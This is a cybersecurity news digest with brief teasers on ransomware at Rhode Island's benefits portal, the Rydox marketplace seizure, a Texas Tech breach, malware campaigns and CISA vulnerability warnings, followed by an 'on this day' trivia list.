Hackers seek ransom after getting SSNs, banking info from state gov't portal
Hackers trying to extort the Rhode Island government infiltrated the state's public benefits system, causing state officials to shut down online services that let residents apply for Medicaid and other assistance programs. "As part of this investigation today, we discovered that within the Rhode Island Bridges system, a cybercriminal had installed dangerous malware that constituted an urgent threat," Governor Dan McKee said at a Friday night press conference, according to The Providence Journal. READ MORE...
Rydox cybercrime marketplace seized by law enforcement, suspected admins arrested
Rydox, an online marketplace used by cybercriminals to sell hacked personal information and tools to commit fraud, has been seized in an international law enforcement operation and its suspected administrators arrested. Rydox has been operating since early 2016, and has been used to sell personally identifiable information, stolen access devices, and tools to assist cybercrime on thousands of occasions according to the US Department of Justice. READ MORE...
Texas Tech University System data breach impacts 1.4 million patients
The Texas Tech University Health Sciences Center and its El Paso counterpart suffered a cyberattack that disrupted computer systems and applications, potentially exposing the data of 1.4 million patients. The organization is a public, academic health institution that is part of the Texas Tech University System, which educates and trains healthcare professionals, conducts medical research, and provides patient care services. READ MORE...
PHP backdoor looks to be work of Chinese-linked APT group
Cybersecurity researchers at a China-based cybersecurity company have uncovered an advanced PHP backdoor that suggests a new asset in the arsenal of Chinese-linked Advanced Persistent Threat group Winnti. Researchers at QiAnXin's XLab discovered the backdoor, which they titled Glutton, targeting China, the United States, Cambodia, Pakistan, and South Africa. The company believes Glutton has been "undetected in the cybersecurity landscape for over a year." READ MORE...
Malicious ads push Lumma infostealer via fake CAPTCHA pages
A large-scale malvertising campaign distributed the Lumma Stealer info-stealing malware through fake CAPTCHA verification pages that prompt users to run PowerShell commands to verify they are not a bot. The campaign leveraged the Monetag ad network to propagate over one million ad impressions daily across three thousand websites. The malicious operation, dubbed "DeceptionAds" by Guardio Labs and Infoblox researchers, is believed to be conducted by the threat actor known as "Vane Viper." READ MORE...
Does Desktop AI Come With a Side of Risk?
Artificial intelligence has come to the desktop. Microsoft 365 Copilot, which debuted last year, is now widely available. Apple Intelligence just reached general beta availability for users of late-model Macs, iPhones, and iPads. And Google Gemini will reportedly soon be able to take actions through the Chrome browser under an in-development agent feature dubbed Project Jarvis. READ MORE...
CISA Warns of Exploited Adobe ColdFusion, Windows Vulnerabilities
The cybersecurity agency CISA warned organizations on Monday that two vulnerabilities affecting Adobe ColdFusion and Microsoft Windows have been exploited in the wild. CISA added the flaws to its Known Exploited Vulnerabilities (KEV) catalog, instructing federal agencies to address them in their environments by early January 2025. The Windows vulnerability is CVE-2024-35250, a high-severity kernel-mode driver issue that can be exploited by an attacker to escalate privileges to System. READ MORE...
FBI Warns of HiatusRAT Attacks on Cameras, DVR Systems
The FBI has issued a fresh alert on the HiatusRAT malware targeting years-old vulnerabilities in web cameras and DVR systems. Initially detailed last year, HiatusRAT has been active since mid-2022, hitting hundreds of organizations in Europe, Latin America, and the US, mainly by exploiting vulnerable high-bandwidth routers. Last year, HiatusRAT's operators were seen performing reconnaissance against a US military procurement system. READ MORE...
- ...in 1903, Orville and Wilbur Wright make the first successful flight of a self-propelled, heavier-than-air airplane.
- ...in 1936, Pope Francis (born Jorge Mario Bergoglio) is born in Buenos Aires, Argentina.
- ...in 1969, the US Air Force ends Project Blue Book, officially closing its study of UFOs but giving rise to endless theories about alien life in the decades to follow.
- ...in 1989, the very first episode of "The Simpsons" airs as a Christmas special.
